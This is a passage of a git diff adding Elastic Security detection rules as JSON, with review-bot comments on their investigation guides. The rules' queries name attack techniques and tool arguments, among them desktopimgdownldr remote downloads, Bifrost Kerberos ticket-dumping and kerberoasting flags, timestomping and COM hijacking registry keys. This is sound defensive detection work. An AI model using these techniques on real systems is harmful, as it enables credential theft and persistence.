rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json new file mode 100644 index 00000000000..77e3a238865 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_112.json 
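Review bot: The last investigation step in `note` tells the analyst to search for logon events (4624) "to the target host after the registry modification", but this rule keys on a `desktopimgdownldr.exe` process start with `/lockscreenurl:http*`, not on a registry change, so the sentence appears carried over from another guide and should read "after the download" or be dropped. The same `note` has a doubled word, "is used to to configure lockscreen/desktop image", which is also present in the `_112` version of this file that follows. The query itself reads fine: the `:` operator is case-insensitive in EQL, so casing variants of the argument are covered, and `?process.pe.original_file_name` tolerates sources that lack the PE field.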
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Desktopimgdownldr Utility", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/master/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process 
Network Events\",\"providers\":[[{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or ?process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", + "references": [ + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat 
Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "15c0b7a7-9c34-4869-b25b-fa6518414899_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json new file mode 100644 index 00000000000..68a35c50a4d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/15dacaa0-5b90-466b-acab-63435a59701a_107.json 
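Review bot: The last triage step in `note` ("Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.") refers to a registry modification, but this rule matches process start events (`process where ... event.type == "start"`), so the sentence reads as carried over from a registry-based guide; suggest `... to the target host after the download attempt.`. The same guide also has a doubled word in "is used to to configure lockscreen/desktop image". Both phrases presumably sit in the preceding `15c0b7a7-..._111.json` hunk as well, whose note body starts before this chunk.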
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of macOS built-in commands to connect to an existing Virtual Private Network (VPN). Adversaries may use VPN connections to laterally move and control remote systems on a network.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Virtual Private Network Connection Attempt", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and\n (\n (process.name : \"networksetup\" and process.args : \"-connectpppoeservice\") or\n (process.name : \"scutil\" and process.args : \"--nc\" and process.args : \"start\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*set VPN to service*\")\n )\n", + "references": [ + "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/osx/manage/vpn.rb", + "https://www.unix.com/man-page/osx/8/networksetup/", + "https://superuser.com/questions/358513/start-configured-vpn-from-command-line-osx" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "15dacaa0-5b90-466b-acab-63435a59701a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "15dacaa0-5b90-466b-acab-63435a59701a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json new file mode 100644 index 00000000000..961a77cd9a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/166727ab-6768-4e26-b80c-948b228ffc06_5.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modification of a file creation time. Adversaries may modify file time attributes to blend malicious content with existing files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Creation Time Changed", + "query": "file where host.os.type == \"windows\" and event.code : \"2\" and\n\n /* Requires Sysmon EventID 2 - File creation time change */\n event.action : \"File creation time changed*\" and \n \n not process.executable : \n (\"?:\\\\Program Files\\\\*\", \n \"?:\\\\Program Files (x86)\\\\*\", \n \"?:\\\\Windows\\\\system32\\\\cleanmgr.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\", \n \"?:\\\\Windows\\\\syswow64\\\\msiexec.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\", \n \"?:\\\\WINDOWS\\\\system32\\\\backgroundTaskHost.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\app-*\\\\slack.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-*\\\\GitHubDesktop.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe\", \n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\") and \n not file.extension : (\"temp\", \"tmp\", \"~tmp\", \"xml\", \"newcfg\") and not user.name : (\"SYSTEM\", \"Local Service\", \"Network Service\") and\n not file.name : (\"LOG\", \"temp-index\", \"license.rtf\", \"iconcache_*.db\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": 
"event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "166727ab-6768-4e26-b80c-948b228ffc06", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "166727ab-6768-4e26-b80c-948b228ffc06_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json new file mode 100644 index 00000000000..07ded1d1dfc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16904215-2c95-4ac8-bf5c-12354e047192_106.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of Bifrost, a known macOS Kerberos pentesting tool, which can be used to dump cached Kerberos tickets or attempt unauthorized authentication techniques such as pass-the-ticket/hash and kerberoasting.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Kerberos Attack via Bifrost", + "query": "event.category:process and host.os.type:macos and event.type:start and\n process.args:(\"-action\" and (\"-kerberoast\" or askhash or asktgs or asktgt or s4u or (\"-ticket\" and ptt) or (dump and (tickets or keytab))))\n", + "references": [ + "https://github.com/its-a-feature/bifrost" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "16904215-2c95-4ac8-bf5c-12354e047192", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.003", + "name": "Pass the Ticket", + "reference": "https://attack.mitre.org/techniques/T1550/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "16904215-2c95-4ac8-bf5c-12354e047192_106", + "type": "security-rule" +} \ No newline at end of file 
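Review bot: The query keys only on `process.args` tokens — `"-action"` together with short bare terms such as `dump`, `ptt` or `s4u` — with no `process.name`, parent or code-signature constraint, and KQL matches each term against any element of the multi-valued `process.args`, so the flags need not even be adjacent. At `risk_score` 73 and `severity` high this deserves a `note` with a triage guide (the sibling rules in this commit carry one) telling analysts what Bifrost is and that other Kerberos tooling using similar flags may produce the same match; whether legitimate admin tools share these exact flags I cannot tell from here. If the argument-only match is deliberate, to cover a renamed binary, state that choice in the note so the absence of a process-name filter is not "fixed" later.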
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json new file mode 100644 index 00000000000..14a7139b3da --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_111.json 
@@ -0,0 +1,149 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Component Object Model Hijacking", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will 
reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\" and\n (\n (\n registry.path : \"HK*\\\\InprocServer32\\\\\" and\n registry.data.strings: (\"scrobj.dll\", \"?:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\"\n ) or\n\n (\n registry.path : \"HKLM\\\\*\\\\InProcServer32\\\\*\" and\n registry.data.strings : (\"*\\\\Users\\\\*\", \"*\\\\ProgramData\\\\*\")\n ) or\n\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (\n registry.path : (\n \"HKEY_USERS\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*\\\\DelegateExecute\",\n \"HKEY_USERS\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*\\\\ScriptletURL*\"\n ) and\n not \n (\n (\n process.name : \"svchost.exe\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Microsoft Windows Publisher\" and\n registry.value : \"DelegateExecute\" and\n registry.data.strings : (\n /* https://strontic.github.io/xcyclopedia/library/clsid_4ED3A719-CEA8-4BD9-910D-E252F997AFC2.html */\n \"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_A56A841F-E974-45C1-8001-7E3F8A085917.html */\n \"{A56A841F-E974-45C1-8001-7E3F8A085917}\",\n\n /* https://strontic.github.io/xcyclopedia/library/clsid_BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78.html */\n \"{BFEC0C93-0B7D-4F2C-B09C-AFFFC4BDAE78}\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\"\n )\n ) or\n (\n 
process.name : \"veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\" and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Veeam Software Group GmbH\"\n ) or \n (\n process.name : (\"ADNotificationManager.exe\", \"Creative Cloud.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\ADNotificationManager.exe\\\" -ToastActivated\",\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Adobe Creative Cloud\\\\ACC\\\\Creative Cloud.exe\\\" -ToastActivated\"\n )\n ) or \n (\n process.name : (\"IslandUpdateComRegisterShell64.exe\", \"IslandUpdate.exe\", \"GoogleUpdateComRegisterShell64.exe\") and\n process.code_signature.trusted == true and\n process.code_signature.subject_name in (\"Island Technology Inc.\", \"Google LLC\") and\n registry.data.strings : (\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Update\\\\*\",\n \"*?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\"\n )\n ) or \n (\n process.name : (\"SelfService.exe\", \"WfShell.exe\") and\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Citrix Systems, Inc.\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Citrix\\\\ICA Client\\\\SelfServicePlugin\\\\SelfService.exe\\\" -ToastActivated\",\n \"%SystemRoot%\\\\system32\\\\shdocvw.dll\",\n \"%SystemRoot%\\\\sysWOW64\\\\shdocvw.dll\"\n )\n ) or \n (\n process.name : (\"msrdcw.exe\") and\n 
